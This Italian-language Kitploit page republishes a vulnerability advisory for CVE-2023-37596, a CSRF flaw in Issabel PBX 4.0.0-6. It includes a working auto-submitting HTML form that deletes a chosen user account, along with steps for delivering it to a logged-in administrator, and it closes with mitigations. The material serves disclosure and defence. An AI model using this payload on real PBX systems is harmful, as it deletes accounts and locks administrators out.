Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-37596 — CVE-2023-37596 è una vulnerabilità di Cross-Site Request Forgery (CSRF) scoperta in Issabel PBX versione 4.0.0-6, una piattaforma open-source di Unified Communications ampiamente utilizzata. | Kitploit
Strumenti/GitHubGitHub/sahiloj/cve-2023-37596
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubsahiloj/cve-2023-37596

CVE-2023-37596

CVE-2023-37596 è una vulnerabilità di Cross-Site Request Forgery (CSRF) scoperta in Issabel PBX versione 4.0.0-6, una piattaforma open-source di Unified Communications ampiamente utilizzata.

Vedi Repository
1116 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-37596 — issabel-pbx 4.0.0-6: Cross-Site Request Forgery (CSRF) — Eliminazione di qualsiasi utente

Severità: Alta  |  CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H)  |  CWE: CWE-352


Indice dei contenuti

  • Panoramica
  • Dettagli della vulnerabilità
  • Impatto
  • Versione vulnerabile
  • Scenario di attacco
  • Prova di concetto (Passaggi per riprodurre)
  • Mitigazione / Rimedio
  • Riferimenti
  • Cronologia della divulgazione
  • Autore

Panoramica

Una vulnerabilità di Cross-Site Request Forgery (CSRF) è stata scoperta in Issabel PBX versione 4.0.0-6. L'endpoint di gestione utenti non implementa alcuna protezione CSRF, il che consente a un attaccante remoto non autenticato di creare una pagina web dannosa che — quando visitata da un amministratore Issabel autenticato — elimina silenziosamente qualsiasi account utente dal sistema. Lo sfruttamento ripetuto può rendere l'intera applicazione inaccessibile rimuovendo tutti gli utenti amministrativi.


Dettagli della vulnerabilità

CampoValore
ID CVECVE-2023-37596
Tipo di vulnerabilitàCross-Site Request Forgery (CSRF)
CWECWE-352
ProdottoIssabel PBX
Versione vulnerabile4.0.0-6
Homepage del fornitorehttps://www.issabel.org/
Repository del softwarehttps://github.com/IssabelFoundation/issabelPBX
Testato suWindows
CVE pubblicato10/07/2023
Scoperta daSahil Ojha

Impatto

Poiché Issabel PBX non convalida l'origine delle richieste che modificano lo stato verso la sua interfaccia di gestione utenti, un attacco CSRF riuscito consente a un attaccante di:

  • Eliminare qualsiasi account utente — incluso l'amministratore principale — senza che la vittima ne venga a conoscenza.
  • Causare un Denial of Service (DoS) — rimuovendo tutti gli utenti, nessuno può accedere, rendendo il pannello di amministrazione PBX completamente inaccessibile.
  • Interrompere i servizi telefonici — la configurazione e la gestione del sistema telefonico diventano non disponibili finché l'account non viene recuperato manualmente a livello di server.

Versione vulnerabile

ProdottoVersione vulnerabileStato
issabel-pbx4.0.0-6Vulnerabile

Scenario di attacco

Un attaccante ospita una pagina HTML dannosa contenente una richiesta HTTP contraffatta che ha come target l'endpoint di eliminazione utenti dell'applicazione Issabel PBX. L'attacco viene innescato automaticamente (o al clic di un pulsante) quando un utente già autenticato in Issabel visita la pagina dannosa nello stesso browser. Poiché il browser include automaticamente i cookie di sessione della vittima in ogni richiesta, il server accetta la richiesta di eliminazione contraffatta come legittima.

Non sono richiesti privilegi speciali dal lato dell'attaccante — è sufficiente un vettore di ingegneria sociale (link di phishing, annuncio malevolo, ecc.) per attirare l'amministratore autenticato sulla pagina appositamente creata.

Caratteristiche principali di questo attacco:

  • Nessuna autenticazione richiesta dal lato dell'attaccante.
  • Un solo clic (o anche zero clic se si utilizzano `` / moduli con invio automatico) è sufficiente per attivare l'exploit.
  • Qualsiasi ID utente (ad es., id=1, id=2, …) può essere preso di mira modificando il payload.
  • L'attacco è invisibile per la vittima; la pagina può mostrare contenuti non correlati mentre invia silenziosamente la richiesta contraffatta.

Prova di concetto (Passaggi per riprodurre)

Prerequisiti

  • Burp Suite (edizione Community o Professional)
  • Un browser configurato per inoltrare il traffico attraverso il proxy di Burp Suite
  • Un'istanza di Issabel PBX 4.0.0-6 accessibile sulla rete

Passaggio 1 — Accedi come Amministratore

Navigare fino alla pagina dell'elenco utenti di Issabel PBX e autenticarsi con le credenziali di amministratore:

root@kitploit:~
https://<Issabel-IP>/index.php?menu=userlist

Passaggio 1 — Elenco utenti di Issabel PBX


Passaggio 2 — Cattura la richiesta di eliminazione utente in Burp Suite

  1. Con il proxy di Burp Suite attivo, fare clic sul pulsante Elimina accanto all'utente target.
  2. Nella cronologia Proxy → HTTP history di Burp Suite, individuare la richiesta DELETE/POST catturata.
  3. Fare clic con il tasto destro sulla richiesta e selezionare Engagement Tools → Generate CSRF PoC.

Passaggio 2 — Cattura della richiesta di eliminazione in Burp Suite


Passaggio 3 — Genera e salva l'exploit CSRF

Burp Suite produrrà una pagina HTML simile a quella qui sotto. Salvarla come file .html (ad es., csrf_exploit.html):

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the form as soon as the page loads
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Nota: Sostituire <Issabel-IP> con l'indirizzo IP o il nome host del server di destinazione e modificare il valore id per prendere di mira un account utente diverso.


Passaggio 4 — Consegnare l'exploit all'amministratore autenticato

Inviare il file csrf_exploit.html (o un link a dove è ospitato) a un utente attualmente connesso a Issabel PBX. Quando la vittima apre la pagina, il modulo viene inviato automaticamente e l'utente target viene eliminato senza alcun prompt di conferma.

Passaggio 4 — Exploit CSRF eseguito, utente eliminato

Passaggio 4 — Conferma che l'utente è stato rimosso


Mitigazione / Rimedio

Le seguenti difese dovrebbero essere applicate dal fornitore e/o dagli amministratori di sistema per rimediare a questa vulnerabilità:

  1. Implementare token CSRF — Generare un token crittograficamente casuale, per sessione (o per richiesta) e convalidarlo lato server per ogni richiesta che modifica lo stato. Le richieste che non trasportano un token valido devono essere rifiutate.

  2. Attributo del cookie SameSite — Impostare l'attributo SameSite del cookie di sessione su Strict o Lax per impedire che le richieste cross-origin trasportino il cookie di sessione nella maggior parte dei browser.

  3. Verificare l'intestazione Origin / Referer — Lato server, rifiutare qualsiasi richiesta che modifica lo stato la cui intestazione Origin o Referer non corrisponde al dominio dell'applicazione.

  4. Richiedere la ri-autenticazione per le azioni distruttive — Chiedere all'utente di reinserire la propria password prima di elaborare azioni irreversibili come l'eliminazione di account utente.

  5. Applicare il principio del privilegio minimo — Assicurarsi che solo gli utenti con un ruolo amministrativo esplicito possano accedere alla funzionalità di eliminazione utenti, riducendo il raggio d'impatto di un attacco riuscito.

Fino a quando non sarà disponibile una patch del fornitore, si consiglia agli amministratori di:

  • Limitare l'accesso al pannello di amministrazione di Issabel PBX agli indirizzi IP attendibili tramite regole del firewall.
  • Evitare di navigare su siti web non attendibili mentre si è connessi al pannello di amministrazione.

Riferimenti

  • NVD — CVE-2023-37596
  • OWASP — Cross-Site Request Forgery (CSRF)
  • CWE-352: Cross-Site Request Forgery (CSRF)
  • Issabel PBX Official Website
  • IssabelFoundation/issabelPBX on GitHub
  • PortSwigger — CSRF

Cronologia della divulgazione

DataEvento
10/07/2023Vulnerabilità scoperta e segnalata
10/07/2023CVE-2023-37596 assegnato

Autore

Sahil Ojha

  • Ricercatore di sicurezza
  • CVE: CVE-2023-37596

Nota di esclusione di responsabilità: Questo repository è pubblicato esclusivamente a scopo educativo e di divulgazione responsabile. Le informazioni qui fornite non devono essere utilizzate per attaccare sistemi senza esplicita autorizzazione scritta del proprietario del sistema. L'autore non si assume alcuna responsabilità per un uso improprio di queste informazioni.

Scarica lo strumento